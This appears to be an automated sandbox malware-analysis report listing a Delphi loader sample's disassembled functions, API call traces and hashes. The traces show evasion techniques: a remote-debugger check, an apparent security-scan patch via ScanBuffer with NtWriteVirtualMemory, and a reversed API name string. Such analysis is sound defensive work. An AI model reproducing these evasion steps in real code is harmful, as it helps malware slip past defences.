                                                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02DB0000,02DDE790), ref: 02DB5B06
                                                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02DB0000,02DDE790), ref: 02DB5B24
                                                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02DB5B42
                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02DB5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02DB5B8B
                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,02DB5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02DB5BD1,?,80000001), ref: 02DB5BA9
                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,02DB5BD8,00000000,?,?,00000000,02DB5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02DB5BCB
                                                                                                                                                                                                                                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02DB5BE8
                                                                                                                                                                                                                                                                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02DB5BF5
                                                                                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02DB5BFB
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02DB5C26
                                                                                                                                                                                                                                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02DB5C6D
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02DB5C7D
                                                                                                                                                                                                                                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02DB5CA5
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02DB5CB5
                                                                                                                                                                                                                                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02DB5CDB
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02DB5CEB
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1759228003-2375825460
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 474777478347c927d8114944437b9259273da7c8bfe04cfb801b5632538df3c5
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bb76da60d9b8a42b915e2dbbf47750e4e2c21c0dcc6c3dc9e7cefe5791f236f6
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 474777478347c927d8114944437b9259273da7c8bfe04cfb801b5632538df3c5
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF51B471E4025CBEFB26D6A4AC66FEF77ADDF04740F8041A1AA06E6281D674DE44CF60
                                                                                                                                                                                                                                                                                                                                  Function 02DC894C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 13205 2dc894c-2dc8971 LoadLibraryW 13206 2dc89bb-2dc89c1 13205->13206 13207 2dc8973-2dc898b GetProcAddress 13205->13207 13208 2dc898d-2dc89ac call 2dc7d78 13207->13208 13209 2dc89b0-2dc89b6 FreeLibrary 13207->13209 13208->13209 13212 2dc89ae 13208->13212 13209->13206 13212->13209
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(bcrypt,?,000008EC,00000000,02E373A8,02DCA587,ScanString,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,Initialize,02E373A8,02DCA93C,UacScan), ref: 02DC8960
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DC897A
                                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008EC,00000000,02E373A8,02DCA587,ScanString,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,Initialize), ref: 02DC89B6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC7DEC
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                                                                                                                                                                                                                  • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1002360270-4067648912
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ef378ea0de0f217322a08627e5a7f05971c837a873319c06444f89df24f7e22c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ad55dcdbd05d7d814c56a58a8cfcf794f78bff0993dd657facce4928a83a82c6
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef378ea0de0f217322a08627e5a7f05971c837a873319c06444f89df24f7e22c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20F0AFF1AC030CAEE321AA6AA84DFA7B79CD787716F400969F909C7240C6705CD0CB60
                                                                                                                                                                                                                                                                                                                                  Function 02DCF744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 13222 2dcf744-2dcf75e GetModuleHandleW 13223 2dcf78a-2dcf792 13222->13223 13224 2dcf760-2dcf772 GetProcAddress 13222->13224 13224->13223 13225 2dcf774-2dcf784 CheckRemoteDebuggerPresent 13224->13225 13225->13223 13226 2dcf786 13225->13226 13226->13223
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(KernelBase), ref: 02DCF754
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02DCF766
                                                                                                                                                                                                                                                                                                                                  • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02DCF77D
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                                                                                                                                                                                                                                  • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                                                                                                                                                                                                                                  • API String ID: 35162468-539270669
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cec2e94142592a12c2dd7f9e72aa349b732e9b0d256a634be7d33d02a3951600
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c6fe4e68f99ddb53916340240b73276841c45fbf476dc12c0a7533115d8f2313
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cec2e94142592a12c2dd7f9e72aa349b732e9b0d256a634be7d33d02a3951600
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77F02E30500348BEEF00A7B488887DCFB6A9B04325F3403E59431732C1E3710A44C690
                                                                                                                                                                                                                                                                                                                                  Function 02DCDD70 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02DB4F2E
                                                                                                                                                                                                                                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DCDE40), ref: 02DCDDAB
                                                                                                                                                                                                                                                                                                                                  • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02DCDE40), ref: 02DCDDDB
                                                                                                                                                                                                                                                                                                                                  • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02DCDDF0
                                                                                                                                                                                                                                                                                                                                  • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02DCDE1C
                                                                                                                                                                                                                                                                                                                                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02DCDE25
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB4C60: SysFreeString.OLEAUT32(02DCF4A4), ref: 02DB4C6E
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1897104825-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 54339034179ccc9a035226889b930731c1bdac040f31322e9bb20bdddcbb98c0
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2694437345eaae88babfce4564356ebd5bd7bc973a0dba559ee95650b3042dc7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54339034179ccc9a035226889b930731c1bdac040f31322e9bb20bdddcbb98c0
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2221C071A40209BAEB51EAD4CC52FDFB7BEEF48700F500465B601E72C1DAB4AE049B64
                                                                                                                                                                                                                                                                                                                                  Function 02DCE4B8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02DCE5F6
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CheckConnectionInternet
                                                                                                                                                                                                                                                                                                                                  • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3847983778-3852638603
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8033487faafb3a5d2ec08cfeb8e173811225bbfebde204306cb3971a888f4afc
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e24de7b5d6500220666f552e3f9b1ba40b69135a8b48efb650d7983ab2a00e69
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8033487faafb3a5d2ec08cfeb8e173811225bbfebde204306cb3971a888f4afc
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC413275B50149DBEB02FBA4D861EDE73BAEF88700F60442AE042E7342DA34ED058F65
                                                                                                                                                                                                                                                                                                                                  Function 02DCDC8C Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02DB4F2E
                                                                                                                                                                                                                                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DCDD5E), ref: 02DCDCCB
                                                                                                                                                                                                                                                                                                                                  • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DCDD05
                                                                                                                                                                                                                                                                                                                                  • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DCDD32
                                                                                                                                                                                                                                                                                                                                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DCDD3B
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3764614163-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3456edc850cb88f1b0dcb12d47ca89c32f4c70f88cff6ce4a7c54b68beb8875c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 513941421b298726f561844fb186f0dcb7dddd12c483eaae92771be34516a069
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3456edc850cb88f1b0dcb12d47ca89c32f4c70f88cff6ce4a7c54b68beb8875c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8521BE71E40209BAEB11EA94DD52FDEB7BEEF08B00F614465B601F72C1D7B47E049A64
                                                                                                                                                                                                                                                                                                                                  Function 02DC7A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DC823C,?,?,00000000,?,02DC7A7E,ntdll,00000000,00000000,02DC7AC3,?,?,00000000), ref: 02DC820A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DC821E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
                                                                                                                                                                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DC7A9F
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4072585319-445027087
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 137e456bd95201decd9fcc87b5744defa78e0895d5b9e4c744643bf4c3b1c2e1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2df07b44c566c80b4cae9632fc1c7b6dad4db68063bf48aa11ab57cd83e10d78
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 137e456bd95201decd9fcc87b5744defa78e0895d5b9e4c744643bf4c3b1c2e1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08113975684209BFEB05EFA4EC65EAAB7EDEB48700FA04468B905D7700D630AE40CF74
                                                                                                                                                                                                                                                                                                                                  Function 02DC7A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DC823C,?,?,00000000,?,02DC7A7E,ntdll,00000000,00000000,02DC7AC3,?,?,00000000), ref: 02DC820A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DC821E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
                                                                                                                                                                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DC7A9F
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4072585319-445027087
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ed7df32ce6c9724f727ea6d4d4670fe5f86239325615992e00609f7f34089d0d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9e2e1ae365c51e95190fc5a5633d426eee8d6d13f7376d3bad5744a16ee8a05b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed7df32ce6c9724f727ea6d4d4670fe5f86239325615992e00609f7f34089d0d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49113975684209BFEB05EFA4EC65E9AB7EDEB48700FA04468B905D7700D630AE40CF74
                                                                                                                                                                                                                                                                                                                                  Function 02DC8400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DC823C,?,?,00000000,?,02DC7A7E,ntdll,00000000,00000000,02DC7AC3,?,?,00000000), ref: 02DC820A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DC821E
